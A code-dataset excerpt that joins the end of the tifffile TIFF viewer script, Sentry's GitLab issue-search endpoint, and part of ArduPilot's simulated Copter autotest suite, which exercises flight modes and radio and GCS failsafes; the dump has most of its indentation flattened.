valfmt='%%.0f [%i]' % data.shape[axis]) for axis in range(dims)]
for slider in sliders:
slider.drawon = False
def set_image(current, sliders=sliders, data=data):
# change image and redraw canvas
cur_ax_dat[1] = data[tuple(current)].squeeze()
image.set_data(cur_ax_dat[1])
for ctrl, index in zip(sliders, current):
ctrl.eventson = False
ctrl.set_val(index)
ctrl.eventson = True
figure.canvas.draw()
def on_changed(index, axis, data=data, current=current):
# callback function for slider change event
index = int(round(index))
cur_ax_dat[0] = axis
if index == current[axis]:
return
if index >= data.shape[axis]:
index = 0
elif index < 0:
index = data.shape[axis] - 1
current[axis] = index
set_image(current)
def on_keypressed(event, data=data, current=current):
# callback function for key press event
key = event.key
axis = cur_ax_dat[0]
if str(key) in '0123456789':
on_changed(key, axis)
elif key == 'right':
on_changed(current[axis] + 1, axis)
elif key == 'left':
on_changed(current[axis] - 1, axis)
elif key == 'up':
cur_ax_dat[0] = 0 if axis == len(data.shape)-1 else axis + 1
elif key == 'down':
cur_ax_dat[0] = len(data.shape)-1 if axis == 0 else axis - 1
elif key == 'end':
on_changed(data.shape[axis] - 1, axis)
elif key == 'home':
on_changed(0, axis)
figure.canvas.mpl_connect('key_press_event', on_keypressed)
for axis, ctrl in enumerate(sliders):
ctrl.on_changed(lambda k, a=axis: on_changed(k, a))
return figure, subplot, image
def _app_show():
"""Block the GUI. For use as skimage plugin."""
pyplot = sys.modules['matplotlib.pyplot']
pyplot.show()
def main(argv=None):
"""Command line usage main function."""
    if sys.version_info < (2, 6):
print("This script requires Python version 2.6 or better.")
print("This is Python version %s" % sys.version)
return 0
if argv is None:
argv = sys.argv
import optparse
parser = optparse.OptionParser(
usage="usage: %prog [options] path",
description="Display image data in TIFF files.",
version="%%prog %s" % __version__)
opt = parser.add_option
opt('-p', '--page', dest='page', type='int', default=-1,
help="display single page")
opt('-s', '--series', dest='series', type='int', default=-1,
help="display series of pages of same shape")
opt('--nomultifile', dest='nomultifile', action='store_true',
default=False, help="don't read OME series from multiple files")
opt('--noplot', dest='noplot', action='store_true', default=False,
help="don't display images")
opt('--interpol', dest='interpol', metavar='INTERPOL', default='bilinear',
help="image interpolation method")
opt('--dpi', dest='dpi', type='int', default=96,
help="set plot resolution")
opt('--debug', dest='debug', action='store_true', default=False,
help="raise exception on failures")
opt('--test', dest='test', action='store_true', default=False,
help="try read all images in path")
opt('--doctest', dest='doctest', action='store_true', default=False,
help="runs the docstring examples")
opt('-v', '--verbose', dest='verbose', action='store_true', default=True)
opt('-q', '--quiet', dest='verbose', action='store_false')
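    # example invocation (hypothetical file name; assumes this module is
    # saved as tifffile.py):  python tifffile.py --page 0 multipage.tif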
settings, path = parser.parse_args()
path = ' '.join(path)
if settings.doctest:
import doctest
doctest.testmod()
return 0
if not path:
parser.error("No file specified")
if settings.test:
test_tifffile(path, settings.verbose)
return 0
if any(i in path for i in '?*'):
path = glob.glob(path)
if not path:
print('no files match the pattern')
return 0
# TODO: handle image sequences
#if len(path) == 1:
path = path[0]
print("Reading file structure...", end=' ')
start = time.time()
try:
tif = TiffFile(path, multifile=not settings.nomultifile)
except Exception as e:
if settings.debug:
raise
else:
print("\n", e)
sys.exit(0)
print("%.3f ms" % ((time.time()-start) * 1e3))
if tif.is_ome:
settings.norgb = True
images = [(None, tif[0 if settings.page < 0 else settings.page])]
if not settings.noplot:
print("Reading image data... ", end=' ')
def notnone(x):
return next(i for i in x if i is not None)
start = time.time()
try:
if settings.page >= 0:
images = [(tif.asarray(key=settings.page),
tif[settings.page])]
elif settings.series >= 0:
images = [(tif.asarray(series=settings.series),
notnone(tif.series[settings.series].pages))]
else:
images = []
for i, s in enumerate(tif.series):
try:
images.append(
(tif.asarray(series=i), notnone(s.pages)))
except ValueError as e:
images.append((None, notnone(s.pages)))
if settings.debug:
raise
else:
print("\n* series %i failed: %s... " % (i, e),
end='')
print("%.3f ms" % ((time.time()-start) * 1e3))
except Exception as e:
if settings.debug:
raise
else:
print(e)
tif.close()
print("\nTIFF file:", tif)
print()
for i, s in enumerate(tif.series):
print ("Series %i" % i)
print(s)
print()
for i, page in images:
print(page)
print(page.tags)
if page.is_palette:
print("\nColor Map:", page.color_map.shape, page.color_map.dtype)
for attr in ('cz_lsm_info', 'cz_lsm_scan_info', 'uic_tags',
'mm_header', 'imagej_tags', 'micromanager_metadata',
'nih_image_header'):
if hasattr(page, attr):
print("", attr.upper(), Record(getattr(page, attr)), sep="\n")
print()
if page.is_micromanager:
print('MICROMANAGER_FILE_METADATA')
print(Record(tif.micromanager_metadata))
if images and not settings.noplot:
try:
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot
except ImportError as e:
warnings.warn("failed to import matplotlib.\n%s" % e)
else:
for img, page in images:
if img is None:
continue
vmin, vmax = None, None
if 'gdal_nodata' in page.tags:
try:
vmin = numpy.min(img[img > float(page.gdal_nodata)])
except ValueError:
pass
if page.is_stk:
try:
vmin = page.uic_tags['min_scale']
vmax = page.uic_tags['max_scale']
except KeyError:
pass
else:
if vmax <= vmin:
vmin, vmax = None, None
title = "%s\n %s" % (str(tif), str(page))
imshow(img, title=title, vmin=vmin, vmax=vmax,
bitspersample=page.bits_per_sample,
photometric=page.photometric,
interpolation=settings.interpol,
dpi=settings.dpi)
pyplot.show()
TIFFfile = TiffFile # backwards compatibility
if sys.version_info[0] > 2:
basestring = str, bytes
unicode = str
if __name__ == "__main__":
sys.exit(main())
| bsd-3-clause | 771,240,095,069,591,600 | 34.651316 | 79 | 0.537928 | false |
mvaled/sentry | src/sentry/integrations/gitlab/search.py | 2 | 2359 | from __future__ import absolute_import
import six
from rest_framework.response import Response
from sentry.api.bases.integration import IntegrationEndpoint
from sentry.integrations.exceptions import ApiError
from sentry.models import Integration
class GitlabIssueSearchEndpoint(IntegrationEndpoint):
def get(self, request, organization, integration_id):
try:
integration = Integration.objects.get(
organizations=organization, id=integration_id, provider="gitlab"
)
except Integration.DoesNotExist:
return Response(status=404)
field = request.GET.get("field")
query = request.GET.get("query")
if field is None:
return Response({"detail": "field is a required parameter"}, status=400)
if query is None:
return Response({"detail": "query is a required parameter"}, status=400)
installation = integration.get_installation(organization.id)
if field == "externalIssue":
project = request.GET.get("project")
if project is None:
return Response({"detail": "project is a required parameter"}, status=400)
try:
iids = [int(query)]
query = None
except ValueError:
iids = None
try:
response = installation.search_issues(query=query, project_id=project, iids=iids)
except ApiError as e:
return Response({"detail": six.text_type(e)}, status=400)
return Response(
[
{
"label": "(#%s) %s" % (i["iid"], i["title"]),
"value": "%s#%s" % (i["project_id"], i["iid"]),
}
for i in response
]
)
elif field == "project":
try:
response = installation.search_projects(query)
except ApiError as e:
return Response({"detail": six.text_type(e)}, status=400)
return Response(
[
{"label": project["name_with_namespace"], "value": project["id"]}
for project in response
]
)
return Response({"detail": "invalid field value"}, status=400)
| bsd-3-clause | 6,474,268,268,709,563,000 | 34.742424 | 97 | 0.539635 | false |
samuelctabor/ardupilot | Tools/autotest/arducopter.py | 1 | 288681 | #!/usr/bin/env python
'''
Fly Copter in SITL
AP_FLAKE8_CLEAN
'''
from __future__ import print_function
import copy
import math
import os
import shutil
import time
import numpy
from pymavlink import mavutil
from pymavlink import mavextra
from pymavlink import rotmat
from pysim import util
from pysim import vehicleinfo
from common import AutoTest
from common import NotAchievedException, AutoTestTimeoutException, PreconditionFailedException
from common import Test
from pymavlink.rotmat import Vector3
# get location of scripts
testdir = os.path.dirname(os.path.realpath(__file__))
SITL_START_LOCATION = mavutil.location(-35.362938, 149.165085, 584, 270)
SITL_START_LOCATION_AVC = mavutil.location(40.072842, -105.230575, 1586, 0)
# Flight mode switch positions are set-up in arducopter.param to be
# switch 1 = Circle
# switch 2 = Land
# switch 3 = RTL
# switch 4 = Auto
# switch 5 = Loiter
# switch 6 = Stabilize
class AutoTestCopter(AutoTest):
@staticmethod
def get_not_armable_mode_list():
return ["AUTO", "AUTOTUNE", "BRAKE", "CIRCLE", "FLIP", "LAND", "RTL", "SMART_RTL", "AVOID_ADSB", "FOLLOW"]
@staticmethod
def get_not_disarmed_settable_modes_list():
return ["FLIP", "AUTOTUNE"]
@staticmethod
def get_no_position_not_settable_modes_list():
return []
@staticmethod
def get_position_armable_modes_list():
return ["DRIFT", "GUIDED", "LOITER", "POSHOLD", "THROW"]
@staticmethod
def get_normal_armable_modes_list():
return ["ACRO", "ALT_HOLD", "SPORT", "STABILIZE", "GUIDED_NOGPS"]
def log_name(self):
return "ArduCopter"
def test_filepath(self):
return os.path.realpath(__file__)
def set_current_test_name(self, name):
self.current_test_name_directory = "ArduCopter_Tests/" + name + "/"
def sitl_start_location(self):
return SITL_START_LOCATION
def mavproxy_options(self):
ret = super(AutoTestCopter, self).mavproxy_options()
if self.frame != 'heli':
ret.append('--quadcopter')
return ret
def sitl_streamrate(self):
return 5
def vehicleinfo_key(self):
return 'ArduCopter'
def default_frame(self):
return "+"
def apply_defaultfile_parameters(self):
# Copter passes in a defaults_filepath in place of applying
# parameters afterwards.
pass
def defaults_filepath(self):
return self.model_defaults_filepath(self.vehicleinfo_key(), self.frame)
def wait_disarmed_default_wait_time(self):
return 120
def close(self):
super(AutoTestCopter, self).close()
# [2014/05/07] FC Because I'm doing a cross machine build
# (source is on host, build is on guest VM) I cannot hard link
# This flag tells me that I need to copy the data out
if self.copy_tlog:
shutil.copy(self.logfile, self.buildlog)
def is_copter(self):
return True
def get_stick_arming_channel(self):
return int(self.get_parameter("RCMAP_YAW"))
def get_disarm_delay(self):
return int(self.get_parameter("DISARM_DELAY"))
def set_autodisarm_delay(self, delay):
self.set_parameter("DISARM_DELAY", delay)
def user_takeoff(self, alt_min=30):
'''takeoff using mavlink takeoff command'''
self.run_cmd(mavutil.mavlink.MAV_CMD_NAV_TAKEOFF,
                     0, # param1 (minimum pitch; unused for copter takeoff)
                     0, # param2 (empty)
                     0, # param3 (empty)
                     0, # param4 (yaw angle)
                     0, # param5 (latitude)
                     0, # param6 (longitude)
                     alt_min # param7 (takeoff altitude in metres)
)
self.progress("Ran command")
self.wait_for_alt(alt_min)
def takeoff(self,
alt_min=30,
takeoff_throttle=1700,
require_absolute=True,
mode="STABILIZE",
timeout=120):
"""Takeoff get to 30m altitude."""
self.progress("TAKEOFF")
self.change_mode(mode)
if not self.armed():
self.wait_ready_to_arm(require_absolute=require_absolute, timeout=timeout)
self.zero_throttle()
self.arm_vehicle()
if mode == 'GUIDED':
self.user_takeoff(alt_min=alt_min)
else:
self.set_rc(3, takeoff_throttle)
self.wait_for_alt(alt_min=alt_min, timeout=timeout)
self.hover()
self.progress("TAKEOFF COMPLETE")
def wait_for_alt(self, alt_min=30, timeout=30, max_err=5):
"""Wait for minimum altitude to be reached."""
self.wait_altitude(alt_min - 1,
(alt_min + max_err),
relative=True,
timeout=timeout)
def land_and_disarm(self, timeout=60):
"""Land the quad."""
self.progress("STARTING LANDING")
self.change_mode("LAND")
self.wait_landed_and_disarmed(timeout=timeout)
def wait_landed_and_disarmed(self, min_alt=6, timeout=60):
"""Wait to be landed and disarmed"""
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
if alt > min_alt:
self.wait_for_alt(min_alt, timeout=timeout)
# self.wait_statustext("SIM Hit ground", timeout=timeout)
self.wait_disarmed()
def hover(self, hover_throttle=1500):
self.set_rc(3, hover_throttle)
# Climb/descend to a given altitude
def setAlt(self, desiredAlt=50):
pos = self.mav.location(relative_alt=True)
if pos.alt > desiredAlt:
self.set_rc(3, 1300)
self.wait_altitude((desiredAlt-5), desiredAlt, relative=True)
if pos.alt < (desiredAlt-5):
self.set_rc(3, 1800)
self.wait_altitude((desiredAlt-5), desiredAlt, relative=True)
self.hover()
# Takeoff, climb to given altitude, and fly east for 10 seconds
def takeoffAndMoveAway(self, dAlt=50, dDist=50):
self.progress("Centering sticks")
self.set_rc_from_map({
1: 1500,
2: 1500,
3: 1000,
4: 1500,
})
self.takeoff(alt_min=dAlt)
self.change_mode("ALT_HOLD")
self.progress("Yaw to east")
self.set_rc(4, 1580)
self.wait_heading(90)
self.set_rc(4, 1500)
self.progress("Fly eastbound away from home")
self.set_rc(2, 1800)
self.delay_sim_time(10)
self.set_rc(2, 1500)
self.hover()
self.progress("Copter staging 50 meters east of home at 50 meters altitude In mode Alt Hold")
    # loiter - fly south east, then loiter within 5m position and altitude
def loiter(self, holdtime=10, maxaltchange=5, maxdistchange=5):
"""Hold loiter position."""
self.takeoff(10, mode="LOITER")
# first aim south east
self.progress("turn south east")
self.set_rc(4, 1580)
self.wait_heading(170)
self.set_rc(4, 1500)
# fly south east 50m
self.set_rc(2, 1100)
self.wait_distance(50)
self.set_rc(2, 1500)
# wait for copter to slow moving
self.wait_groundspeed(0, 2)
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
start = self.mav.location()
tstart = self.get_sim_time()
self.progress("Holding loiter at %u meters for %u seconds" %
(start_altitude, holdtime))
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
pos = self.mav.location()
delta = self.get_distance(start, pos)
alt_delta = math.fabs(m.alt - start_altitude)
self.progress("Loiter Dist: %.2fm, alt:%u" % (delta, m.alt))
if alt_delta > maxaltchange:
raise NotAchievedException(
"Loiter alt shifted %u meters (> limit %u)" %
(alt_delta, maxaltchange))
if delta > maxdistchange:
raise NotAchievedException(
"Loiter shifted %u meters (> limit of %u)" %
(delta, maxdistchange))
self.progress("Loiter OK for %u seconds" % holdtime)
self.progress("Climb to 30m")
self.change_alt(30)
self.progress("Descend to 20m")
self.change_alt(20)
self.do_RTL()
def watch_altitude_maintained(self, min_alt, max_alt, timeout=10):
'''watch alt, relative alt must remain between min_alt and max_alt'''
tstart = self.get_sim_time_cached()
while True:
if self.get_sim_time_cached() - tstart > timeout:
return
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
            if m.alt <= min_alt:
                raise NotAchievedException("Altitude not maintained: want >%f got=%f" % (min_alt, m.alt))
            if m.alt >= max_alt:
                raise NotAchievedException("Altitude not maintained: want <%f got=%f" % (max_alt, m.alt))
def test_mode_ALT_HOLD(self):
self.takeoff(10, mode="ALT_HOLD")
self.watch_altitude_maintained(9, 11, timeout=5)
# feed in full elevator and aileron input and make sure we
# retain altitude:
self.set_rc_from_map({
1: 1000,
2: 1000,
})
self.watch_altitude_maintained(9, 11, timeout=5)
self.set_rc_from_map({
1: 1500,
2: 1500,
})
self.do_RTL()
def fly_to_origin(self, final_alt=10):
origin = self.poll_message("GPS_GLOBAL_ORIGIN")
self.change_mode("GUIDED")
self.guided_move_global_relative_alt(origin.latitude,
origin.longitude,
final_alt)
def change_alt(self, alt_min, climb_throttle=1920, descend_throttle=1080):
"""Change altitude."""
def adjust_altitude(current_alt, target_alt, accuracy):
if math.fabs(current_alt - target_alt) <= accuracy:
self.hover()
elif current_alt < target_alt:
self.set_rc(3, climb_throttle)
else:
self.set_rc(3, descend_throttle)
self.wait_altitude(
(alt_min - 5),
alt_min,
relative=True,
called_function=lambda current_alt, target_alt: adjust_altitude(current_alt, target_alt, 1)
)
self.hover()
def setGCSfailsafe(self, paramValue=0):
# Slow down the sim rate if GCS Failsafe is in use
if paramValue == 0:
self.set_parameter("FS_GCS_ENABLE", paramValue)
self.set_parameter("SIM_SPEEDUP", 10)
else:
self.set_parameter("SIM_SPEEDUP", 4)
self.set_parameter("FS_GCS_ENABLE", paramValue)
# fly a square in alt_hold mode
    def fly_square(self, side=50, timeout=300):
        """Fly a square, flying N then E."""
        self.takeoff(20, mode="ALT_HOLD")
tstart = self.get_sim_time()
# ensure all sticks in the middle
self.set_rc_from_map({
1: 1500,
2: 1500,
3: 1500,
4: 1500,
})
# switch to loiter mode temporarily to stop us from rising
self.change_mode('LOITER')
# first aim north
self.progress("turn right towards north")
self.set_rc(4, 1580)
self.wait_heading(10)
self.set_rc(4, 1500)
# save bottom left corner of box as waypoint
self.progress("Save WP 1 & 2")
self.save_wp()
# switch back to ALT_HOLD mode
self.change_mode('ALT_HOLD')
# pitch forward to fly north
self.progress("Going north %u meters" % side)
self.set_rc(2, 1300)
self.wait_distance(side)
self.set_rc(2, 1500)
# save top left corner of square as waypoint
self.progress("Save WP 3")
self.save_wp()
# roll right to fly east
self.progress("Going east %u meters" % side)
self.set_rc(1, 1700)
self.wait_distance(side)
self.set_rc(1, 1500)
# save top right corner of square as waypoint
self.progress("Save WP 4")
self.save_wp()
# pitch back to fly south
self.progress("Going south %u meters" % side)
self.set_rc(2, 1700)
self.wait_distance(side)
self.set_rc(2, 1500)
# save bottom right corner of square as waypoint
self.progress("Save WP 5")
self.save_wp()
# roll left to fly west
self.progress("Going west %u meters" % side)
self.set_rc(1, 1300)
self.wait_distance(side)
self.set_rc(1, 1500)
# save bottom left corner of square (should be near home) as waypoint
self.progress("Save WP 6")
self.save_wp()
# reduce throttle again
self.set_rc(3, 1500)
# descend to 10m
self.progress("Descend to 10m in Loiter")
self.change_mode('LOITER')
self.set_rc(3, 1200)
time_left = timeout - (self.get_sim_time() - tstart)
self.progress("timeleft = %u" % time_left)
if time_left < 20:
time_left = 20
self.wait_altitude(-10, 10, timeout=time_left, relative=True)
self.set_rc(3, 1500)
self.save_wp()
# save the stored mission to file
mavproxy = self.start_mavproxy()
num_wp = self.save_mission_to_file_using_mavproxy(
mavproxy,
os.path.join(testdir, "ch7_mission.txt"))
self.stop_mavproxy(mavproxy)
if not num_wp:
self.fail_list.append("save_mission_to_file")
self.progress("save_mission_to_file failed")
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.change_mode('AUTO')
self.set_current_waypoint(1)
self.wait_waypoint(0, num_wp-1, timeout=500)
self.progress("test: MISSION COMPLETE: passed!")
self.land_and_disarm()
# enter RTL mode and wait for the vehicle to disarm
def do_RTL(self, distance_min=None, check_alt=True, distance_max=10, timeout=250):
"""Enter RTL mode and wait for the vehicle to disarm at Home."""
self.change_mode("RTL")
self.hover()
self.wait_rtl_complete(check_alt=check_alt, distance_max=distance_max, timeout=timeout)
def wait_rtl_complete(self, check_alt=True, distance_max=10, timeout=250):
"""Wait for RTL to reach home and disarm"""
self.progress("Waiting RTL to reach Home and disarm")
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
home = ""
alt_valid = alt <= 1
distance_valid = home_distance < distance_max
if check_alt:
if alt_valid and distance_valid:
home = "HOME"
else:
if distance_valid:
home = "HOME"
self.progress("Alt: %.02f HomeDist: %.02f %s" %
(alt, home_distance, home))
# our post-condition is that we are disarmed:
if not self.armed():
if home == "":
raise NotAchievedException("Did not get home")
# success!
return
raise AutoTestTimeoutException("Did not get home and disarm")
def fly_loiter_to_alt(self):
"""loiter to alt"""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
self.set_parameter("PLND_TYPE", 4)
self.set_analog_rangefinder_parameters()
self.reboot_sitl()
num_wp = self.load_mission("copter_loiter_to_alt.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1550)
self.wait_current_waypoint(2)
self.set_rc(3, 1500)
self.wait_waypoint(0, num_wp-1, timeout=500)
self.wait_disarmed()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
# Tests all actions and logic behind the radio failsafe
def fly_throttle_failsafe(self, side=60, timeout=360):
self.start_subtest("If you haven't taken off yet RC failure should be instant disarm")
self.change_mode("STABILIZE")
self.set_parameter("DISARM_DELAY", 0)
self.arm_vehicle()
self.set_parameter("SIM_RC_FAIL", 1)
self.disarm_wait(timeout=1)
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter("DISARM_DELAY", 10)
# Trigger an RC failure with the failsafe disabled. Verify no action taken.
self.start_subtest("Radio failsafe disabled test: FS_THR_ENABLE=0 should take no failsafe action")
self.set_parameter('FS_THR_ENABLE', 0)
self.set_parameter('FS_OPTIONS', 0)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.end_subtest("Completed Radio failsafe disabled test")
# Trigger an RC failure, verify radio failsafe triggers,
        # restore radio, verify RC function by changing modes to circle
# and stabilize.
self.start_subtest("Radio failsafe recovery test")
self.set_parameter('FS_THR_ENABLE', 1)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.set_rc(5, 1050)
self.wait_mode("CIRCLE")
self.set_rc(5, 1950)
self.wait_mode("STABILIZE")
self.end_subtest("Completed Radio failsafe recovery test")
        # Trigger an RC failure, verify failsafe triggers and RTL completes
self.start_subtest("Radio failsafe RTL with no options test: FS_THR_ENABLE=1 & FS_OPTIONS=0")
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe RTL with no options test")
        # Trigger an RC failure, verify failsafe triggers and land completes
self.start_subtest("Radio failsafe LAND with no options test: FS_THR_ENABLE=3 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 3)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe LAND with no options test")
        # Trigger an RC failure, verify failsafe triggers and SmartRTL completes
self.start_subtest("Radio failsafe SmartRTL->RTL with no options test: FS_THR_ENABLE=4 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->RTL with no options test")
        # Trigger an RC failure, verify failsafe triggers and SmartRTL->Land completes
self.start_subtest("Radio failsafe SmartRTL->Land with no options test: FS_THR_ENABLE=5 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL_Land with no options test")
# Trigger a GPS failure and RC failure, verify RTL fails into
# land mode and completes
self.start_subtest("Radio failsafe RTL fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 1)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe RTL fails into land mode due to bad position.")
# Trigger a GPS failure and RC failure, verify SmartRTL fails
# into land mode and completes
self.start_subtest("Radio failsafe SmartRTL->RTL fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe SmartRTL->RTL fails into land mode due to bad position.")
# Trigger a GPS failure and RC failure, verify SmartRTL fails
# into land mode and completes
self.start_subtest("Radio failsafe SmartRTL->LAND fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe SmartRTL->LAND fails into land mode due to bad position.")
# Trigger a GPS failure, then restore the GPS. Trigger an RC
# failure, verify SmartRTL fails into RTL and completes
self.start_subtest("Radio failsafe SmartRTL->RTL fails into RTL mode due to no path.")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.wait_statustext("SmartRTL deactivated: bad position", timeout=60)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->RTL fails into RTL mode due to no path.")
# Trigger a GPS failure, then restore the GPS. Trigger an RC
# failure, verify SmartRTL fails into Land and completes
self.start_subtest("Radio failsafe SmartRTL->LAND fails into land mode due to no path.")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.wait_statustext("SmartRTL deactivated: bad position", timeout=60)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->LAND fails into land mode due to no path.")
# Trigger an RC failure in guided mode with the option enabled
# to continue in guided. Verify no failsafe action takes place
self.start_subtest("Radio failsafe with option to continue in guided mode: FS_THR_ENABLE=1 & FS_OPTIONS=4")
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.setGCSfailsafe(1)
self.set_parameter('FS_THR_ENABLE', 1)
self.set_parameter('FS_OPTIONS', 4)
self.takeoffAndMoveAway()
self.change_mode("GUIDED")
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("GUIDED")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.change_mode("ALT_HOLD")
self.setGCSfailsafe(0)
# self.change_mode("RTL")
# self.wait_disarmed()
self.end_subtest("Completed Radio failsafe with option to continue in guided mode")
# Trigger an RC failure in AUTO mode with the option enabled
# to continue the mission. Verify no failsafe action takes
# place
self.start_subtest("Radio failsafe RTL with option to continue mission: FS_THR_ENABLE=1 & FS_OPTIONS=1")
self.set_parameter('FS_OPTIONS', 1)
self.progress("# Load copter_mission")
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
# self.takeoffAndMoveAway()
self.change_mode("AUTO")
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("AUTO")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.wait_mode("AUTO")
# self.change_mode("RTL")
# self.wait_disarmed()
self.end_subtest("Completed Radio failsafe RTL with option to continue mission")
# Trigger an RC failure in AUTO mode without the option
# enabled to continue. Verify failsafe triggers and RTL
# completes
self.start_subtest("Radio failsafe RTL in mission without "
"option to continue should RTL: FS_THR_ENABLE=1 & FS_OPTIONS=0")
self.set_parameter('FS_OPTIONS', 0)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.clear_mission(mavutil.mavlink.MAV_MISSION_TYPE_MISSION)
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe RTL in mission without option to continue")
self.progress("All radio failsafe tests complete")
self.set_parameter('FS_THR_ENABLE', 0)
self.reboot_sitl()
# Tests all actions and logic behind the GCS failsafe
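# FS_GCS_ENABLE values exercised below (assumed mapping, matching
# the subtest names): 0=disabled, 1=RTL, 3=SmartRTL-or-RTL,
# 4=SmartRTL-or-Land, 5=Land.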
def fly_gcs_failsafe(self, side=60, timeout=360):
try:
self.test_gcs_failsafe(side=side, timeout=timeout)
except Exception as ex:
self.setGCSfailsafe(0)
self.set_parameter('FS_OPTIONS', 0)
self.disarm_vehicle(force=True)
self.reboot_sitl()
raise ex
def test_gcs_failsafe(self, side=60, timeout=360):
# Test double-SmartRTL; ensure we do SmartRTL twice rather than
# landing (tests fix for an actual bug)
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.context_push()
self.start_subtest("GCS failsafe SmartRTL twice")
self.setGCSfailsafe(3)
self.set_parameter('FS_OPTIONS', 8)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
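# zeroing the heartbeat rate simulates loss of the GCS link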
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe")
def ensure_smartrtl(mav, m):
if m.get_type() != "HEARTBEAT":
return
# can't use mode_is here because we're in the message hook
print("Mode: %s" % self.mav.flightmode)
if self.mav.flightmode != "SMART_RTL":
raise NotAchievedException("Not in SMART_RTL")
self.install_message_hook_context(ensure_smartrtl)
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.set_heartbeat_rate(0)
